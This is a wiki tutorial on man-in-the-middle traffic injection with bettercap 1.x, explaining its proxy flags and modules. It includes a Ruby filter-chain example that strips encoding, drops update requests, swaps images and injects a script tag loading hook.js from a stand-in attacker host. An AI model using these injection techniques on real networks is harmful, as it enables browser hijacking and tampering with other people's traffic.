MITM/Traffic Injection
From charlesreid1
What is traffic injection?
The term "traffic injection," in the context of a Man in the Middle attack, refers to any situation where the attacker is conducting a man in the middle attack and is actively modifying traffic passing between the sheep and the gateway.
This can take many forms, of course:
- Attacker can modify traffic from gateway to sheep, or from sheep to gateway
- Attacker can selectively drop packets for denial of service of certain protocols/content
- Attacker can perform search/replace on traffic (e.g., replace all images with other images)
- Attacker can inject things into traffic, e.g., particular content, javascript/css files, etc.
How traffic injection works
Typically, a man in the middle attacker sets up an HTTP and/or HTTPS proxy server. On one side of the proxy is the sheep, and on the other side is the gateway. As traffic from the sheep enters the proxy, it is passed through any request-side filters, its headers are updated, and when (if) it comes out the other side, it is forwarded along to the gateway. Likewise, as traffic from the gateway enters the proxy, it is passed through a different set of response-side filters, its headers are updated, and when (if) it comes out the other side, it is forwarded along to the sheep.
This gives the attacker control of the traffic. The different forms of traffic injection (modification, selective drops, search/replace, etc.) are simply different filters that the attacker writes and drops into the proxy. Two practical points apply to any filter that edits a body: the proxy must correct Content-Length (or re-chunk the response) after changing the body, or the browser will truncate the page or hang waiting for bytes; and filters can only search a plaintext body, so the proxy normally strips Accept-Encoding from the sheep's request so the server does not answer with a gzip-compressed body.
Implementation
To actually implement a traffic injection attack, you can use the Bettercap tool to perform the man in the middle attack. Bettercap implements a built-in HTTP and HTTPS proxy, which lets you execute a man-in-the-middle attack and perform traffic injection/modification on the fly, all in one tool. Bettercap can also hand traffic to a separate, non-Bettercap proxy program. Note that the HTTPS proxy presents its own certificate, which is not issued by a CA the sheep trusts, so the sheep will see a certificate warning unless the connection is first downgraded to HTTP (see MITM/HTTPS).
This page describes bettercap 1.x, which is written in Ruby; the filters you drop into its proxy are therefore written in Ruby. Bettercap 2.x is a rewrite in Go whose http.proxy module is scripted with JavaScript caplets rather than the Ruby modules and flags below.
bettercap proxy
bettercap has a --proxy flag to enable the HTTP proxy and a --proxy-port flag to set the port it listens on.
Once you enable the proxy, you'll also want to pick a proxy module using the --proxy-module flag. Proxy modules are the filters you write and drop into the proxy. They are written in Ruby, and three ship with bettercap 1.x: injecthtml, injectcss, and injectjs.
Note: You can also tell the proxy to intercept HTTP on non-standard (non-80) ports using the --http-ports flag.
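The filter chain described under "How traffic injection works", in the shape of the proxy modules named above, as an added example in Ruby. This is not bettercap's code: Request and Response are constructed stand-in structs, the on_sheep_request hook and the FilterChain class are this example's own design, and only the on_request(request, response) hook name follows the bettercap 1.x proxy-module convention (an assumption; check the injectjs/injecthtml sources shipped with your bettercap version). The sample HTTP exchange is constructed, not captured traffic.

```ruby
# Added example, not bettercap code: a miniature proxy filter chain.
# Request/Response are stand-in structs; on_sheep_request and FilterChain are
# this example's own design. Only the on_request(request, response) hook name
# follows the bettercap 1.x proxy-module convention (assumption: verify against
# the module sources of your bettercap version).

Request  = Struct.new(:verb, :host, :path, :headers)
Response = Struct.new(:code, :headers, :body) do
  def content_type
    headers['Content-Type'].to_s
  end
end

# Request-side filter (sheep -> gateway): if the server answered gzip'd, the
# response filters below would be editing compressed bytes, so strip
# Accept-Encoding before forwarding the sheep's request.
class StripAcceptEncoding
  def on_sheep_request(request)
    request.headers.delete('Accept-Encoding')
  end
end

# Injection: add a payload (script tag, CSS link, raw HTML) to every HTML page.
class InjectHTML
  def initialize(payload)
    @payload = payload
  end

  def on_request(request, response)
    return unless response.content_type.start_with?('text/html')
    # Prefer injecting before </body>; append if the page has no closing tag.
    response.body << @payload unless response.body.sub!('</body>', "#{@payload}</body>")
  end
end

# Search/replace: point every <img src=...> at an attacker-chosen image.
class ReplaceImages
  def initialize(src)
    @src = src
  end

  def on_request(request, response)
    return unless response.content_type.start_with?('text/html')
    response.body.gsub!(/(<img\b[^>]*?\bsrc=")[^"]*(")/i) { "#{$1}#{@src}#{$2}" }
  end
end

# Selective drop: swallow responses whose path matches (denial of service of one resource).
class DropPath
  def initialize(pattern)
    @pattern = pattern
  end

  def on_request(request, response)
    :drop if request.path.match?(@pattern)
  end
end

class FilterChain
  def initialize(request_filters, response_filters)
    @request_filters  = request_filters
    @response_filters = response_filters
  end

  # Sheep -> gateway direction.
  def forward_request(request)
    @request_filters.each { |f| f.on_sheep_request(request) }
    request
  end

  # Gateway -> sheep direction. Returns the edited response, or nil if a filter dropped it.
  def forward_response(request, response)
    @response_filters.each do |f|
      return nil if f.on_request(request, response) == :drop
    end
    # Body edits change its length; fix Content-Length or the browser truncates/hangs.
    response.headers['Content-Length'] = response.body.bytesize.to_s
    response
  end
end

# Constructed sample exchange (hostnames are placeholders, not real sites).
def sample_request(path)
  Request.new('GET', 'example.test', path,
              { 'Host' => 'example.test', 'Accept-Encoding' => 'gzip, deflate' })
end

def sample_html_response
  body = '<html><head></head><body><img src="/logo.png"><img src="/cat.png"></body></html>'
  Response.new(200, { 'Content-Type' => 'text/html; charset=utf-8',
                      'Content-Length' => body.bytesize.to_s }, body.dup)
end

def build_chain
  FilterChain.new(
    [StripAcceptEncoding.new],
    [DropPath.new(%r{\A/updates/}),
     ReplaceImages.new('http://attacker.test/lol.png'),
     InjectHTML.new('<script src="http://attacker.test/hook.js"></script>')]
  )
end

if __FILE__ == $PROGRAM_NAME
  chain = build_chain
  req = chain.forward_request(sample_request('/index.html'))
  res = chain.forward_response(req, sample_html_response)
  puts res.body, "Content-Length: #{res.headers['Content-Length']}"
  p chain.forward_response(sample_request('/updates/check'), sample_html_response)
end
```

Running the file prints the rewritten page (both images replaced, the script tag injected before </body>) with a corrected Content-Length, then nil for the dropped /updates/ request. The order of the response filters matters: a drop filter placed first saves the work of editing a body that will never be delivered.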